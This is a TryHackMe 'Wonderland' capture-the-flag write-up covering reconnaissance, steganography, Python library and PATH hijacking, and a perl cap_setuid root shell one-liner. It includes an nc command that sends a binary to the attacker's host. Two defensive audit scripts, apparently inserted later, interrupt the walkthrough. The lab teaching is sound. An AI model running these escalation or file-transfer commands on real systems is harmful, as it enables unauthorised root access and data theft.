Wonderland — TryHackMe — WriteUP

TonyRahmos
7 min read, Oct 29, 2020


Hello. I’m Rahmos. Here is my Wonderland — TryHackMe — WriteUp. Check it out!

First, deploy the machine and run nmap to find open ports.

nmap -A -T4 -v <ip>

[screenshot: nmap output]

As port 80 (HTTP) is open, let’s visit the website.

[screenshot: the website]

Pressing Ctrl + U to view the source shows nothing much, so let’s look for hidden directories with dirbuster.

[screenshot: dirbuster results]

As you can see, there are lots of nested hidden directories. Following them leads to our final destination in Wonderland: /r/a/b/b/i/t

[screenshot: Door to Wonderland page]

Press Ctrl + U to view the page source and you will see your key to open the door!

[screenshot: page source]

It looks like an SSH credential! But leave it aside for now. Let’s visit /img, download the .jpg photos and examine them.

[screenshot: /img directory]

As they are .jpg photos, we can use steghide to extract hidden data.

steghide extract -sf file-name.jpg

[screenshot: steghide output]

As you can see, only white_rabbit_1.jpg contains hidden data, which is extracted to hint.txt. Read this file.

[screenshot: hint.txt]

There is only that one line. The “r a b b i t” is the chain of hidden sub-folders (which we already found with dirbuster). So what now? Let’s log in over SSH!

ssh alice@<ip>

[screenshot: ssh login]

Success! Now get our 1st flag.

ls -l

Well, there is no user.txt in alice’s home folder, but there is a root.txt 😣 And of course, we cannot read it right now.

Let’s sudo -l to see if Alice can run sudo:

sudo -l

Well, that’s it! We can run the Python file in our home folder as rabbit.

sudo -u rabbit /usr/bin/python3.6 /home/alice/walrus_and_the_carpenter.py

So basically the script prints out 10 random lines of the poem.

What is suspicious is that it imports the random library. When the script runs, Python fetches the libraries it needs from a predefined list of locations (directories). You can use the command below to list those directories.

python3 -c 'import sys; print(sys.path)'

As you can see, the '' (empty string) entry is where the search starts: it is our current directory (/home/alice). Python then goes through the folders listed after it, in order, until it finds “random.py” and uses it. Now let’s see where the real random.py is.

locate random.py

[screenshot: locate random.py output]

Now we know that random.py lives in /usr/lib/python3.6, which comes AFTER alice’s home folder in the list. This means that if we create a random.py file in alice’s home folder, the Python program will use that random.py, not the real one in /usr/lib/python3.6.

Let’s create random.py but inside, we will spawn a shell!

Now save this random.py, chmod +x it to make it executable, and then run walrus_and_the_carpenter.py as rabbit.

sudo -u rabbit /usr/bin/python3.6 /home/alice/walrus_and_the_carpenter.py

And now I’m rabbit!

NOTE:

I will explain again what we just did to get the rabbit shell. If you have already understood it, you can skip this part.

Explanation:

When we execute the Python script as rabbit, because it imports the random library, Python goes through all the folders listed above looking for “random.py”.
However, we tricked it by creating a random.py in alice’s home folder, and because alice’s home folder is the first folder it searches, the Python program uses the random.py we just created and ignores the “real” random.py. Inside this “fake” random.py are two lines of code that spawn a shell. That’s why we get a shell as rabbit!

Ok so let’s get back to Wonderland.

cd to rabbit’s home folder to see what’s inside.

[screenshot: rabbit’s home folder]

There is an executable file called teaParty. Let’s try executing it.

./teaParty

It ends with the message: Segmentation fault (core dumped). I don’t understand what it does, so let’s copy this binary to our machine and decompile it. I will use nc to transfer the file.

On your machine, start a listener:

nc -lvnp 4444

On the SSH machine, run:

nc <your-host-ip> 4444 < teaParty

Wait a while and press Ctrl + C. You will now have teaParty on your machine. I will use ghidra to decompile it.

[screenshot: ghidra decompilation]

After decompiling, I can conclude that the program does nothing special beyond printing those lines. What we need to focus on is the “system” call: it runs the “date” binary. When the program executes, it takes the result of “date”, adds 1 hour and prints it out.

Since I can run date from the command line, it lives in /bin/date, and system() finds it by searching PATH. So again, what if we create our own “date” program and put it in a folder that comes BEFORE /bin in PATH? The program will execute this malicious “date” instead of the real one!

So what do we do now? We will create a script called “date” that spawns a shell, put it in the /tmp folder (as we have full permissions there), and add /tmp to PATH before /bin.

[screenshot: creating the fake date script]

Then chmod +x date to make it executable.

Now run this command to add /tmp to the PATH environment variable (for a program to be found by name, its folder, here /tmp, needs to be in PATH):

export PATH=/tmp:$PATH

As you can see, /tmp has been added to the front of PATH.

Now run the teaParty again.
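Both escalations above (the fake random.py in alice’s home folder, the fake date in /tmp) work because a directory the low-privileged user can write to is searched before the directory holding the real file. This added check, which is not part of the original writeup, audits a search list (sys.path or $PATH) for exactly that condition; the audit_* wrappers run it live against the current interpreter and environment, while shadowing_dirs can be fed a constructed list. On this box the real stdlib is /usr/lib/python3.6 and date is in /bin; those two paths are assumed in the usage below.

```python
import os
import sys
import sysconfig


def shadowing_dirs(search_path, trusted_dir, writable, cwd="."):
    """Return entries of search_path that are searched BEFORE trusted_dir and
    are writable. A file with the right name dropped into any of them shadows
    the trusted copy (random.py before the stdlib, date before /bin)."""
    risky = []
    for raw in search_path:
        entry = raw or cwd  # '' in sys.path (python3 -c ...) means the cwd
        if os.path.normpath(entry) == os.path.normpath(trusted_dir):
            break  # entries after the trusted copy are never consulted first
        if writable(entry):
            risky.append(entry)
    return risky


def _writable_by_me(directory):
    return os.path.isdir(directory) and os.access(directory, os.W_OK)


def audit_sys_path():
    """Live check for this interpreter: writable sys.path entries that come
    before the standard library. When a script is run as `python3 file.py`,
    sys.path[0] is the script's directory, so a writable script directory
    (alice's home folder here) shows up in the result."""
    stdlib = sysconfig.get_paths()["stdlib"]
    return shadowing_dirs(sys.path, stdlib, _writable_by_me, os.getcwd())


def audit_path_env(trusted_dir):
    """Live check for $PATH: writable directories searched before trusted_dir,
    the directory a binary called through system("date") should come from."""
    entries = os.environ.get("PATH", "").split(os.pathsep)
    return shadowing_dirs(entries, trusted_dir, _writable_by_me, os.getcwd())


if __name__ == "__main__":
    # Assumed locations for this box; adjust for the system being audited.
    print("writable sys.path entries before the stdlib:", audit_sys_path())
    print("writable PATH entries before /bin:", audit_path_env("/bin"))
```

If either list is non-empty for the user that sudo or a setuid/capability-bearing program runs as, the fix is to make the script or binary use absolute paths (or a clean PATH) and to stop sudo rules from running scripts out of user-writable directories.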

Now I’m hatter! Let’s see what’s inside hatter’s home folder.

It’s a password: WhyIsARavenLikeAWritingDesk? I tried to su to tryhackme with that password but it didn’t work, so it is hatter’s password only.

Now let’s see if we can run sudo as hatter:

sudo -l

[screenshot: sudo -l output]

Uh-oh! We cannot run sudo as hatter, so we need another way. Let’s get linpeas.sh onto the box. You can either download it there or transfer it from your machine. If you choose to transfer it, here is the command:

scp linpeas.sh hatter@<ip>:/home/hatter

[screenshot: scp transfer]

Now get back to the SSH session and run the script.

./linpeas.sh > result.txt

Scrolling down, I see the “Capabilities” section:

[screenshot: linpeas Capabilities section]

The perl binary has a capability set. Look at https://gtfobins.github.io/gtfobins/perl/#capabilities

We will get root using perl.

$(which perl) -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";'
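The finding that linpeas surfaced here comes from file capabilities, which getcap -r / lists. This added audit, not part of the original writeup, parses that output and flags binaries whose effective set contains a capability that amounts to root (cap_setuid on perl is the one this box has); the sample lines are constructed, and the dangerous-capability list is my own selection.

```python
import re
import subprocess

# Capabilities that let anyone who can execute the file act as root in practice.
# cap_setuid lets the process setuid(0) itself, which is what perl does above.
DANGEROUS_CAPS = {
    "cap_setuid", "cap_setgid", "cap_dac_override", "cap_dac_read_search",
    "cap_sys_admin", "cap_sys_ptrace", "cap_sys_module", "cap_chown",
}

# Accepts both getcap output styles: "/path = cap_x+ep" (libcap < 2.41)
# and "/path cap_x=ep" (libcap >= 2.41).
_GETCAP_LINE = re.compile(
    r"^(?P<path>\S+)\s*(?:=\s*)?(?P<caps>[a-z_,]+)[=+](?P<flags>[a-z]*)$")


def parse_getcap_line(line):
    """Return (path, set_of_caps, flags) for one getcap line, else None."""
    m = _GETCAP_LINE.match(line.strip())
    if not m:
        return None
    return m.group("path"), set(m.group("caps").split(",")), m.group("flags")


def risky_capabilities(getcap_output):
    """List (path, [dangerous caps]) for every file whose effective ('e')
    capability set contains something from DANGEROUS_CAPS."""
    findings = []
    for line in getcap_output.splitlines():
        parsed = parse_getcap_line(line)
        if parsed is None:
            continue
        path, caps, flags = parsed
        hits = sorted(caps & DANGEROUS_CAPS)
        if hits and "e" in flags:  # only effective caps apply at exec time
            findings.append((path, hits))
    return findings


def audit_live_system(root="/"):
    """Run getcap -r over the filesystem (permission errors are discarded).
    Written for Python 3.6, the version on this box, hence no capture_output."""
    proc = subprocess.run(["getcap", "-r", root], stdout=subprocess.PIPE,
                          stderr=subprocess.DEVNULL, universal_newlines=True)
    return risky_capabilities(proc.stdout)


# Constructed sample mixing both output formats; not real output from the box.
SAMPLE = """\
/usr/bin/perl = cap_setuid+ep
/usr/bin/ping = cap_net_raw+ep
/usr/bin/mtr-packet cap_net_raw=ep
"""

if __name__ == "__main__":
    for path, caps in risky_capabilities(SAMPLE):
        print(f"{path}: {','.join(caps)}  (remove with: setcap -r {path})")
```

Removing the capability with setcap -r on the interpreter closes this path; cap_net_raw on ping and mtr-packet is the normal, expected use of file capabilities and is not flagged.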

[screenshot: perl privilege escalation]

Finally I’m root! Let’s get all of our flags.

The end.

HAPPY HACKING
